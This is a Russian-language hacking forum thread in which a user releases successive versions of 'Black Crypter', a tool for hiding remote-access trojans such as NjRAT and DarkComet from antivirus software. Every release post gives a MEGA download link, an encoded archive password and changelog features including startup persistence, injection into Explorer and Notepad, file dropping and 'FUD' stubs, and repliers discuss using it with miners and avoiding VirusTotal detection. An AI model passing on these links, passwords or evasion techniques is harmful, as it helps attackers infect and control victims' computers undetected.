РЕКЛАМА НА ФОРУМЕ 

РЕКЛАМА НА ФОРУМЕ MultiVPN РЕКЛАМА НА ФОРУМЕ

Криптор Black Crypter v1.0 | Black Arrow

Реакции
52
Баллы
23
Доброго времени суток, дамы и господа! Итак, настал тот звёздный час, когда в криптор будет добавлено что то, помимо музыкальных композиций.
Дабы не постить постоянно +100500 "разных" крипторов(Как я делал это ранее...), я наконец, как нормальный человек, буду просто периодически обновлять стаб этого криптора.
Так же со временем его функционал будет расти, пропорционально прокачке моих навыков "Копировать-вставить", но геометрическую прогрессию не обещаю.
О всех найденных багах, ошибках, вылетах, падениях и прочих богомерзких вещах - просьба сообщать в тему криптора или же мне на жабу [email protected] пожалуйста, спасибо! Всё.

Особенности v1.0:
- Встроенный функционал Pumper-а. (Кому он нужен, то ранее выкладывал его отдельно.)
- Генерирование рандомной иконки на каждый криптованный файл. ( Самое вкусное. Если Вам это не нужно, то криптованный файл выходит без иконки, дабы Вы могли поставить свою.)
- Генерирование рандомного ключа для крипта. (Шлак. Присутствует практически во всех моих крипторах, ничего особенного.)
- Криптор автоматически закрывается по окончанию крипта, так что не пугайтесь. (Окно About можно закрыть, тыкнув на иконку файлика.)
- Отсутствие пафосной музыки. (Возрадуйтесь же!.)

DarkComet win7 x64: OK
DarkTrack Alien win7 x64: OK
NjRAT win7 x64: OK
Ozone win7 x64: OK

RAR Pass (RxBot):
"\x66\x40\x9B\x47\x10\x84\xBE\x3D\xF8\x";

https://mega.nz/#!GoYylYhB!b2yHETGvXwb81Z78cOulYHVc_TNLHHbZc5yCwBAJrDo

P.S.

В About уже указано, но всё же ещё раз спасибо очень хорошему человеку с ником r00t_t00r, за помощь в моих периодических тупняках. Огромная благодарность тебе и печенюшка, размером со здание Кремля. Вот.​

Последнее редактирование модератором:
Реакции
0
Баллы
1
Где можно расшифровать rxbot? весь интернет облазил не 1 тулзы годной не нашел

OP
Black Arrow
Реакции
52
Баллы
23
А вот и новая версия подъехала.

UPD v1.1:
- Новый чистый стаб. (Чистить старые я не буду - каждый раз будет новый стаб.)
- Исправлено косячное описание стаба, которое автоматом добавляло некоторые детекты при крипте. (Эх, щас бы выпустить новый криптор с обновлениями и сразу же с ходу такой фейл допустить...)
- Исправлены мелкие визуальные недочёты по оформлению. (Скорее всего их никто не заметил, но они были.)
- Добавлена пропись в автозагрузку - Start Up. (Что хотели, то и добавил. Получите,
распишитесь)

RAR Pass
{96,77,-120,79,29,-117,187,52,0};

https://mega.nz/#!HhQVnSSZ!jM_CKp9dTXVNVSwJdd2FMWMBWuu2GJUiVnBmuy9MwCc

OP
Black Arrow
Реакции
52
Баллы
23
Посетило озарение - решил попробовать. Всё.

UPD v1.2:
- Добавлена поддержка .NET Framework 4-той версии. (Так как в настоящее время всё больше людей переходят на Windows 10, а Windows XP потихоньку начинают забывать, то решил сделать нечто подобное. Для тех, кто в танке, поясню: В предустановленной 10-ке отсутствует фреймворк 2-рой версии, если конечно его туда вручную не установили, ибо он не требуется из за наличия более высокой версии, а потому эту просто частично вырезали/полностью удалили. Обычный мой крипт построен на версии 2.0, и следовательно на большинстве систем Windows 10 он работать не будет, хотя теперь просто необходимо переключиться на 4.0. Но! Выбрав его, не будет работать поддержка Windows XP, помните об этом при крипте. Конец истории.)
- Особенность переключения между режимами 2.0 и 4.0 (При переключении версии фреймворка, Вы не меняете её в стабе при крипте,а полностью переключаетесь на другой стаб! Тоесть теперь при переходе на другой .NET режим, в крипторе имеются 2 разных стаба, для разных версий. Соответственно и жить криптор будет дольше - 1 стаб загрязнился/слили, 2 стаб возможно ещё чистый.
- Новые чистые стабы (Напоминаю, что старые стабы не чищу, а пишу полностью новые.)

Ozone win10 x64: OK

RAR Pass(Restrik):
FrygrlLj|v

https://mega.nz/#!y8owTA4a!nQ6uKxeAiHsBe7jRqYgYrErzB6FJmfqq0qLV31TgMSQ

Реакции
0
Баллы
1
Все канешн хорошо... Но я уже задолбался пытаться раскодить пас

OP
Black Arrow
Реакции
52
Баллы
23
Очередная обнова.

UPD 1.3:
- Реализован инжект Вашего софта в системные процессы, вроде Проводника, Блокнота и тд.(ВНИМАНИЕ! Инжектит только натив! С .Net работать не станет! Возможно когда то будет поддерживать и .Net, но это не точно. Так же, быть может, добавлю и другие процессы для инжекта. Если инжект Вам не нужен - оставляйте not Inject как есть, выключать его не надо, иначе крипт сломает файл. Вот и всё.)
- Новые чистые стабы. (Ну как и всегда собственно.)

NjRAT win7 x64 [Not Inject]: OK

RAR Pass:
01001001011011100110101001100101011000110111010001100100011000010111001001101011

https://mega.nz/#!31QiFSCJ!v2GWMeZ9KxWRA8OZMKAmNh7WDtuUPGe4cxzlUTxL2Ko

OP
Black Arrow
Реакции
52
Баллы
23

UPD v1.4:
- Реализован дроппинг файла в выбраную вами директорию. (Особенность этого дроппинга в том, что он не такой как например в RAT-ах. В ратниках дроп происходит копированием запущеного билда в указанную при создании папку, здесь же файл не копируется, а перетаскивается именно этот самый запущенный и уже работающий, помните об этом.)
- Незначительные изменения в оформлении и обновление About (Как и для чего вы используете сию софтину мне по*уй, извините. Каждый в ответе за себя сам, как то так. Если имеются вопросы - стучите по контактам.)
- Новые чистые стабы. (Да, дамы и господа - долгожданный FUD, точнее дабл-FUD.)

NjRAT win7 x64 [Not Inject]: OK

Encrypted Enigma x2.
RAR Pass: *[email protected]_GJ
KEY for RAR Pass: /FZkDs
Key for KEY: RAR Pass

https://mega.nz/#!G8QUCZ7a!QLVT-o7maty_J5VZTnZ0lKhNLaiUzLLAbby6hAIYjPQ

Последнее редактирование модератором:
Реакции
0
Баллы
1
Отличный криптор, и майнер не ломает, жаль кто то быстро сливает на ВТ все... Спасибо!

Реакции
0
Баллы
1
Такие крипторы вообще больше 2 днеи живут ?

Реакции
1
Баллы
3
Вопрос, криптует ли он файлы, которые комета дропет в Temp(или др. папку)?
И есть ли вообще такие крипторы?

Сверху